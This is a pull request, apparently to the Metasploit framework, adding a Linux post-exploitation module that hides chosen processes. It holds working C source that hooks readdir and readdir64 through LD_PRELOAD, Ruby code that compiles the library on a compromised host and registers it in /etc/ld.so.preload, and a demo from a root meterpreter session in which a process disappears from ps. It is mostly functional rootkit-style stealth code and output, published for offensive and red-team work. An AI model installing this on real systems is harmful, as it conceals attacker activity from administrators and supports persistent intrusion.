### PR TITLE
Add module for linux process hide.

### DIFF
--- a/data/post/process_hider/process_hider.erb
+++ b/data/post/process_hider/process_hider.erb
@@ -1,0 +1,117 @@
+#define _GNU_SOURCE
+#include <dirent.h>
+#include <string.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dlfcn.h>
+
+/*
+ * Each process with this name will be excluded
+ */
+static const char *to_filter_process = <%= @filtered_cmdline.inspect %>;
+
+/*
+ * Get the directory name given a DIR* handle
+ */
+static int get_dir_name(DIR* dir, char * buf, size_t size)
+{
+	int fd = dirfd(dir);
+	if (fd == -1)
+	{
+		return 0;
+	}
+
+	char tmp[64];
+	snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
+
+	ssize_t ret = readlink(tmp, buf, size);
+
+	if(ret == -1)
+	{
+    return 0;
+  }
+
+  buf[ret] = 0;
+  return 1;
+}
+
+/*
+ * Get  process cmdline given its pid
+ */
+static int get_process_cmdline(char *pid, char *buf)
+{
+	// check if pid is number.
+	if(strspn(pid, "0123456789") != strlen(pid))
+	{
+		return 0;
+	}
+
+	char tmp[256] = "";
+	snprintf(tmp, sizeof(tmp), "/proc/%s/cmdline", pid);
+
+	char buffer[4096];
+
+	int fd ;
+	if((fd = open(tmp, O_RDONLY)) == -1 )
+	{
+		// error: cannot read the cmd
+		return 0;
+	}
+
+	// read cmdline into buf
+	int nbytesread = read(fd, buffer, 4096);
+	char *end = buffer + nbytesread;
+
+	for (char *p = buffer; p < end;)
+	{
+		strncat(buf, p, strlen(p));
+		strcat(buf, " ");
+		while(*p++); // skip NULL until start of the next string.
+	}
+
+	close(fd);
+	return 1;
+}
+
+/*
+ * Define the hooked function:  readdir and readdir64
+ */
+#define DECLARE_READDIR(dirent, readdir)                                        \
+static struct dirent* (*original_##readdir)(DIR*) = NULL;                       \
+                                                                                \
+struct dirent* readdir(DIR *dirp)                                               \
+{                                                                               \
+    if(original_##readdir == NULL) {                                            \
+        original_##readdir = dlsym(RTLD_NEXT, #readdir);                        \
+        if(original_##readdir == NULL)                                          \
+        {                                                                       \
+            fprintf(stderr, "Error in dlsym: %s\n", dlerror());                 \
+        }                                                                       \
+    }                                                                           \
+                                                                                \
+    struct dirent* dir;                                                         \
+														                                                    \
+    while(1)  /* keep reading the directory */                                  \
+    {                                                                           \
+        dir = original_##readdir(dirp);                                         \
+        if(dir) {                                                               \
+            char dir_name[256];                                                 \
+            char process_cmdline[4096] = "";                                    \
+            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&                \
+                strcmp(dir_name, "/proc") == 0 &&                               \
+                get_process_cmdline(dir->d_name, process_cmdline) &&            \
+                strstr(process_cmdline, to_filter_process) != NULL ) {          \
+                continue;                                                       \
+            }                                                                   \
+        }                                                                       \
+        break;                                                                  \
+    }                                                                           \
+    return dir;                                                                 \
+}
+
+DECLARE_READDIR(dirent64, readdir64);
+DECLARE_READDIR(dirent, readdir);

--- a/documentation/modules/post/linux/manage/hide_process.md
+++ b/documentation/modules/post/linux/manage/hide_process.md
@@ -1,0 +1,97 @@
+## Description
+
+This module will hide a process with LD_PRELOAD according to command arguments or process name.
+
+
+## Options
+
+ **CMDLINE**
+
+ The cmdline or process name to filter.
+
+ **LIBPATH**
+
+The shared obeject library file path. Use /var/tmp/ as default directory.
+
+
+
+## Verification Steps
+
+1. get session on target
+2. `use post/linux/manage/hide_process`
+3. `set cmdline <cmdline>`
+4. `run`
+
+## Scenarios
+
+### Tested on Kali Linux Rolling
+```
+msf5 post(linux/manage/hide_process) > options
+
+Module options (post/linux/manage/hide_process):
+
+   Name     Current Setting         Required  Description
+   ----     ---------------         --------  -----------
+   CMDLINE  evil.apk                yes       The cmdline to filter.
+   LIBPATH  /var/tmp/.YzfidldoeyHd  yes       The shared obeject library file path
+   SESSION  5                       yes       The session to run this module on.
+
+msf5 post(linux/manage/hide_process) > sessions -i
+sessions -i 1  sessions -i 5
+msf5 post(linux/manage/hide_process) > sessions -i 5
+[*] Starting interaction with 5...
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 192.168.56.103
+OS           : Kali kali-rolling (Linux 4.17.0-kali1-amd64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > bg
+[*] Backgrounding session 5...
+msf5 post(linux/manage/hide_process) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Checking system requirement...
+[+] All requirement is good.
+[*] Writing c code to /tmp/TbkAYnG.c
+[*] Compile c code to /var/tmp/.YzfidldoeyHd as a shared object library file
+[*] Installing the process hider hook...
+[+] Install the hook to hide process successful!
+[+] To uninstall the hook, run command below in meterpreter.
+execute -H -f sed -a "-i -e '/\/var\/tmp\/.YzfidldoeyHd/d' /etc/ld.so.preload"
+rm /var/tmp/.YzfidldoeyHd
+[*] Post module execution completed
+
+
+```
+
+## Before run the module
+```
+# root @ kali in /tmp [6:13:21] 
+$ ps -ef | grep -v grep |grep evil.apk  
+root      4809 10240  0 06:12 pts/2    00:00:00 vim evil.apk
+
+```
+
+## After 
+```
+# root @ kali in /tmp [6:15:30] 
+$ ps -ef | grep -v grep |grep evil.apk  
+
+```
+Bingo! This process wouldn't show by `ps` command.
+
+## Clean it
+```
+msf5 post(linux/manage/hide_process) > sessions -i 5
+[*] Starting interaction with 5...
+
+meterpreter > execute -H -f sed -a "-i -e '/\/var\/tmp\/.YzfidldoeyHd/d' /etc/ld.so.preload"
+Process 4907 created.
+meterpreter > rm /var/tmp/.YzfidldoeyHd
+meterpreter >
+```
+Everything backs to normal!

--- a/documentation/modules/post/linux/manage/hide_process.md
+++ b/documentation/modules/post/linux/manage/hide_process.md
@@ -11,7 +11,7 @@ This module will hide a process with LD_PRELOAD according to command arguments o
 
  **LIBPATH**
 
-The shared obeject library file path. Use /var/tmp/ as default directory.
+The shared obeject library file path. Use `/var/tmp/` as default directory.
 
 
 

--- a/documentation/modules/post/linux/manage/hide_process.md
+++ b/documentation/modules/post/linux/manage/hide_process.md
@@ -11,7 +11,7 @@ This module will hide a process with LD_PRELOAD according to command arguments o
 
  **LIBPATH**
 
-The shared obeject library file path. Use `/var/tmp/` as default directory.
+The shared object library file path. Use `/var/tmp/` as default directory.
 
 
 
@@ -33,7 +33,7 @@ Module options (post/linux/manage/hide_process):
    Name     Current Setting         Required  Description
    ----     ---------------         --------  -----------
    CMDLINE  evil.apk                yes       The cmdline to filter.
-   LIBPATH  /var/tmp/.YzfidldoeyHd  yes       The shared obeject library file path
+   LIBPATH  /var/tmp/.YzfidldoeyHd  yes       The shared object library file path
    SESSION  5                       yes       The session to run this module on.
 
 msf5 post(linux/manage/hide_process) > sessions -i
@@ -94,4 +94,4 @@ Process 4907 created.
 meterpreter > rm /var/tmp/.YzfidldoeyHd
 meterpreter >
 ```
-Everything backs to normal!
+Everything is back to normal.

--- a/modules/post/linux/manage/hide_process.rb
+++ b/modules/post/linux/manage/hide_process.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Post
 
     register_options [
         OptString.new('CMDLINE', [true, 'The cmdline to filter.']),
-        OptString.new('LIBPATH', [true, 'The shared obeject library file path', "/var/tmp/.#{Rex::Text.rand_text_alpha(8..12)}" ])
+        OptString.new('LIBPATH', [true, 'The shared object library file path', "/var/tmp/.#{Rex::Text.rand_text_alpha(8..12)}" ])
     ]
 
     register_advanced_options [
@@ -122,10 +122,10 @@ class MetasploitModule < Msf::Post
 
     # Check the result.
     begin
-      unless cmd_exec("grep -q #{lib_path.inspect} #{preload_path} && echo true").to_s.include?('true') # Check if contain the lib_path
+      unless read_file(preload_path).to_s.include?(lib_path) # Check if contains the lib_path
         return false
       end
-    rescue Exception => e
+    rescue => e
       vprint_line(e)
       return false
     end

--- a/modules/post/linux/manage/hide_process.rb
+++ b/modules/post/linux/manage/hide_process.rb
@@ -1,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'         => 'Linux hide process with LD_PRELOAD',
+        'Description'  => %q{
+        This module will hide a process with LD_PRELOAD according to process name or command arguments.
+        },
+        'References'   => [ 'https://github.com/gianlucaborello/libprocesshider' ],
+        'License'      => MSF_LICENSE,
+        'Author'       => [ 'Green-m <greenm.xxoo[at]gmail.com>'],
+        'Platform'     => [ 'linux' ],
+        'Targets'      =>
+        [
+          [ 'Automatic', {} ]
+        ]
+      )
+    )
+
+    register_options [
+        OptString.new('CMDLINE', [true, 'The cmdline to filter.']),
+        OptString.new('LIBPATH', [true, 'The shared obeject library file path', "/var/tmp/.#{Rex::Text.rand_text_alpha(8..12)}" ])
+    ]
+
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def run
+    @filtered_cmdline = datastore['CMDLINE']
+    @clean_up = ""
+
+    print_status("Checking system requirement...")
+    unless check_requirement
+      print_error("Something goes wrong!")
+      return
+    end
+
+    print_good("All requirement is good.")
+
+    write_files
+
+    compile_code
+
+    if install_hook
+      print_good("Install the hook to hide process successful!")
+    else
+      print_error("Install the hook failed.")
+      cmd_exec("rm -f #{lib_path}") # Clean it.
+    end
+
+    print_good("To uninstall the hook, run command below in meterpreter.")
+    print_line(clean_up)
+  end
+
+  def check_requirement
+    unless has_gcc?
+      print_error("Gcc not found.")
+      return false
+    end
+
+    unless check_priv
+      return false
+    end
+
+    true
+  end
+
+  #
+  # Check if the ld.so.preload is accessiable.
+  #
+  def check_priv
+    unless file_exist?(preload_path) && writable?(preload_path) or writable?('/etc/')
+      print_error("No privilege to access #{preload_path}")
+      return false
+    end
+
+    true
+  end
+
+  #
+  # Writing source code to a temp file to wait to be compiled.
+  #
+  def write_files
+    vprint_status("Writing c code to #{artifact}")
+    write_file(artifact, code_template)
+
+    fail_with(Failure::NoAccess, "Unable to write code to #{artifact}") unless file_exist?(artifact)
+  end
+
+  ##
+  # Compile the code to so file.
+  ##
+  def compile_code
+    code = "gcc -Wall -fPIC -shared -o #{lib_path} #{artifact} -ldl"
+
+    vprint_status("Compile c code to #{lib_path} as a shared object library file ")
+
+    cmd_exec(code)
+    cmd_exec("rm -f #{artifact}") # Clean the artifact
+
+    # Check result of the compilation phase
+    fail_with(Failure::BadConfig, 'Unable to compile the code with gcc...') unless file_exist?(lib_path)
+  end
+
+  #
+  # To install the hook in ld.so.preload
+  #
+  def install_hook
+    vprint_status("Installing the process hider hook...")
+    cmd_exec("echo #{lib_path} >> #{preload_path}")
+
+    # Check the result.
+    begin
+      unless cmd_exec("grep -q #{lib_path.inspect} #{preload_path} && echo true").to_s.include?('true') # Check if contain the lib_path
+        return false
+      end
+    rescue Exception => e
+      vprint_line(e)
+      return false
+    end
+
+    true
+  end
+
+  #
+  # Clean the hook in ld.so.preload and remove the shared object file.
+  #
+  def clean_up
+    cmds  = %Q{execute -H -f sed -a "-i -e \'/#{lib_path.gsub('/', '\/')}/d\' #{preload_path}"\n}
+    cmds << "rm #{lib_path}"
+  end
+
+  #
+  # The source file.
+  #
+  def code_template
+    template = File.read(File.join(Msf::Config.data_directory, 'post', 'process_hider', 'process_hider.erb'))
+    ERB.new(template).result(binding)
+  end
+
+  def writable_dir
+    datastore['WritableDir']
+  end
+
+  #
+  # The temporary code file left on the victim machine.
+  #
+  def artifact
+    @artifact ||= "#{writable_dir}/#{Rex::Text.rand_text_alpha(6..12)}.c"
+  end
+
+  def lib_path
+    datastore['LIBPATH']
+  end
+
+  def preload_path
+    '/etc/ld.so.preload'
+  end
+end


### PR DESCRIPTION
## Verification Steps

1. get session on target
2. `use post/linux/manage/hide_process`
3. `set cmdline <cmdline>`
4. `run`

## Scenarios

### Tested on Kali Linux Rolling
```
msf5 post(linux/manage/hide_process) > options
Module options (post/linux/manage/hide_process):
   Name     Current Setting         Required  Description
   ----     ---------------         --------  -----------
   CMDLINE  evil.apk                yes       The cmdline to filter.
   LIBPATH  /var/tmp/.YzfidldoeyHd  yes       The shared obeject library file path
   SESSION  5                       yes       The session to run this module on.
msf5 post(linux/manage/hide_process) > sessions -i
sessions -i 1  sessions -i 5
msf5 post(linux/manage/hide_process) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.56.103
OS           : Kali kali-rolling (Linux 4.17.0-kali1-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > bg
[*] Backgrounding session 5...
msf5 post(linux/manage/hide_process) > run
[!] SESSION may not be compatible with this module.
[*] Checking system requirement...
[+] All requirement is good.
[*] Writing c code to /tmp/TbkAYnG.c
[*] Compile c code to /var/tmp/.YzfidldoeyHd as a shared object library file
[*] Installing the process hider hook...
[+] Install the hook to hide process successful!
[+] To uninstall the hook, run command below in meterpreter.
execute -H -f sed -a "-i -e '/\/var\/tmp\/.YzfidldoeyHd/d' /etc/ld.so.preload"
rm /var/tmp/.YzfidldoeyHd
[*] Post module execution completed
```

## Before run the module
```
# root @ kali in /tmp [6:13:21] 
$ ps -ef | grep -v grep |grep evil.apk  
root      4809 10240  0 06:12 pts/2    00:00:00 vim evil.apk
```

## After 
```
# root @ kali in /tmp [6:15:30] 
$ ps -ef | grep -v grep |grep evil.apk  
```
Bingo! This process wouldn't show by `ps` command.

## Clean it
```
msf5 post(linux/manage/hide_process) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > execute -H -f sed -a "-i -e '/\/var\/tmp\/.YzfidldoeyHd/d' /etc/ld.so.preload"
Process 4907 created.
meterpreter > rm /var/tmp/.YzfidldoeyHd
meterpreter >
```
Everything backs to normal!